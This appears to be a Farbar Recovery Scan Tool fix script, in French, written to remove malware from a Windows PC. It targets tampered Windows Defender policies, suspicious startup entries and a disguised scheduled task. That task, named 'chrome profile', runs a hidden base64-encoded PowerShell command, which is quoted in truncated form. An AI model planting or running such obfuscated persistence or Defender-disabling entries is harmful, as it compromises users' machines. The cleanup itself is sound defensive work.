start::
closeprocesses:
createrestorepoint:
HKLM-x32\...\Run: [SimAppPro] => [X]
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Restriction <==== ATTENTION
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiVirus] Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3499636868-3341211885-4009424328-1000\...\Run: [GalaxyClient] => [X]
HKU\S-1-5-21-3499636868-3341211885-4009424328-1000\...\Run: [{5E9C47D5-C2A3-4B5B-9646-23F9F5362F1A}] => "C:\Users\Utilisateur\Downloads\MTGAInstaller.exe" /cmdloc "HKCU\Software\Wizards of the Coast AiTemp\{5E9C47D5-C2A3-4B5B-9646-23F9F5362F1A}" (Pas de fichier) <==== ATTENTION
HKU\S-1-5-21-3499636868-3341211885-4009424328-1000\...\Run: [opensubtitles-uploader] => C:\Users\Utilisateur\AppData\Roaming\opensubtitles-uploader\opensubtitles-uploader.exe 0OuPK (Pas de fichier)
HKU\S-1-5-21-3499636868-3341211885-4009424328-1000\...\MountPoints2: {0e1b4ae3-b188-11eb-b7bb-806e6f6e6963} - "D:\RunGame.exe" 
Task: {69948E43-736D-4661-B16C-974F6337FD75} - System32\Tasks\Microsoft\Windows\Windows Error Reporting\SystemInfo => C:\Users\Utilisateur\AppData\Roaming\\sysinfotool\\sitool.exe -st -tu 7 (Pas de fichier) <==== ATTENTION
Task: {C6126FA7-1F0A-4F24-BC33-8B0D2005CC6B} - System32\Tasks\chrome profile => cmd /c powershell -WindowStyle Hidden -E "CgAkAGUAbgBjAF8AQQBzAGMAXwBTAHQAcgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQA7AAoAJAB2AEwATwBDACAAPQAgACIAMQA4ACIAOwAKAAoACgAkAHAAUgBlAG0AIAA9ACAAIgBXAHkASQB4AE4ARABZAHgATgBqAFEANQBOAGoAYwA1AE8ARABFADEATQBqAEkAdwBOAGoAVQA0AE (l'élément de données a 5427 caractères en plus). <==== ATTENTION
C:\Users\Utilisateur\AppData\Local\chrome_profile
2022-09-09 02:30 - 2022-09-09 02:30 - 000000000 ____D C:\WINDOWS\system32\Tasks\Safer-Networking
2022-09-09 02:29 - 2022-09-09 02:29 - 000000000 ____D C:\Users\Utilisateur\AppData\Local\Safer-Networking Ltd
cmd: netsh advfirewall reset
emptytemp:
end::